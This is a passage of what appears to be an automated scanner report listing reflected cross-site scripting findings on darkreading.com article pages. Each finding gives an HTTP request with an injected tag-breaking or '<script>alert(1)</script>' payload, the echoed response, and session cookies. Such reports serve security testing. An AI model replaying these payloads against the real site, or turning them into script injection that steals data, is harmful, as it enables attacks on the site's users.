GET /security/articleaad7d"><a>9375303c7a3/208803634/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e797"><a>4ad869e08c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2088036345e797"><a>4ad869e08c/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 16e32'><a>98fa3b7a21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803634/index.html16e32'><a>98fa3b7a21e HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a67e9"><a>b84c55a0d32 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803634/index.htmla67e9"><a>b84c55a0d32 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Social En ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F208803634%2Findex.htmla67e9%22%3E%3Ca%3Eb84c55a0d32&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/208803634/index.htmla67e9"><a>b84c55a0d32"> ...[SNIP]...
3.435. http://www.darkreading.com/security/article/208803634/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/208803634/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d8f"><script>alert(1)</script>b741d94c8e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/208803634/index.html?13d8f"><script>alert(1)</script>b741d94c8e4=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef86"><a>996ace43219 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlebef86"><a>996ace43219/208803672/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 810ac"><a>e7155387f03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/208803672810ac"><a>e7155387f03/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf079"><a>2846627ef99 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803672/index.htmlbf079"><a>2846627ef99 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 285cc'><a>3e43d09413c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/208803672/index.html285cc'><a>3e43d09413c HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Turkish H ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/208803672/index.html285cc'><a>3e43d09413c'> ...[SNIP]...
3.440. http://www.darkreading.com/security/article/208803672/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/208803672/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e04e3"><script>alert(1)</script>a3bca52555b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/208803672/index.html?e04e3"><script>alert(1)</script>a3bca52555b=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49db6"><a>023321e16f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article49db6"><a>023321e16f7/220000718/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc414"><a>a4e3606a352 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/220000718bc414"><a>a4e3606a352/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 82725'><a>46bd8fd319b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/220000718/index.html82725'><a>46bd8fd319b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faf9c"><a>262949bdd88 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/220000718/index.htmlfaf9c"><a>262949bdd88 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Antivirus ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F220000718%2Findex.htmlfaf9c%22%3E%3Ca%3E262949bdd88&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/220000718/index.htmlfaf9c"><a>262949bdd88"> ...[SNIP]...
3.445. http://www.darkreading.com/security/article/220000718/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/220000718/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e5c6"><script>alert(1)</script>de2e1b78aeb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/220000718/index.html?5e5c6"><script>alert(1)</script>de2e1b78aeb=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7021d"><a>0aad94137b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article7021d"><a>0aad94137b/222200174/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f7c6"><a>47c8f3b1d89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2222001743f7c6"><a>47c8f3b1d89/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1d8a'><a>ed240ad1ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222200174/index.htmlf1d8a'><a>ed240ad1ff0 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baa92"><a>828205fc86d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222200174/index.htmlbaa92"><a>828205fc86d HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Secure US ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222200174%2Findex.htmlbaa92%22%3E%3Ca%3E828205fc86d&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222200174/index.htmlbaa92"><a>828205fc86d"> ...[SNIP]...
3.450. http://www.darkreading.com/security/article/222200174/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/222200174/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb87a"><script>alert(1)</script>44ef265650d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222200174/index.html?eb87a"><script>alert(1)</script>44ef265650d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63a70"><a>e96c29a1f96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article63a70"><a>e96c29a1f96/222300840/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff89"><a>25c92a4f2c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2223008406ff89"><a>25c92a4f2c8/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c832"><a>3b467756a54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222300840/index.html4c832"><a>3b467756a54 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c92e3'><a>214b543bdca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222300840/index.htmlc92e3'><a>214b543bdca HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Spear-Phi ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/222300840/index.htmlc92e3'><a>214b543bdca'> ...[SNIP]...
3.455. http://www.darkreading.com/security/article/222300840/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/222300840/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f26a0"><script>alert(1)</script>1f1cad0c780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222300840/index.html?f26a0"><script>alert(1)</script>1f1cad0c780=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cada4"><a>589b9472ea8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlecada4"><a>589b9472ea8/222301436/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb3e"><a>998f87e844b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2223014368eb3e"><a>998f87e844b/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d843'><a>f82629f135f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301436/index.html9d843'><a>f82629f135f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73cb1"><a>2df67c5bd79 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/222301436/index.html73cb1"><a>2df67c5bd79 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>'Aurora' ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F222301436%2Findex.html73cb1%22%3E%3Ca%3E2df67c5bd79&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/222301436/index.html73cb1"><a>2df67c5bd79"> ...[SNIP]...
3.460. http://www.darkreading.com/security/article/222301436/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/222301436/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c19ae"><script>alert(1)</script>e23d9dc99ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/222301436/index.html?c19ae"><script>alert(1)</script>e23d9dc99ff=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04f6"><a>acdf0912119 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleb04f6"><a>acdf0912119/222301500/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
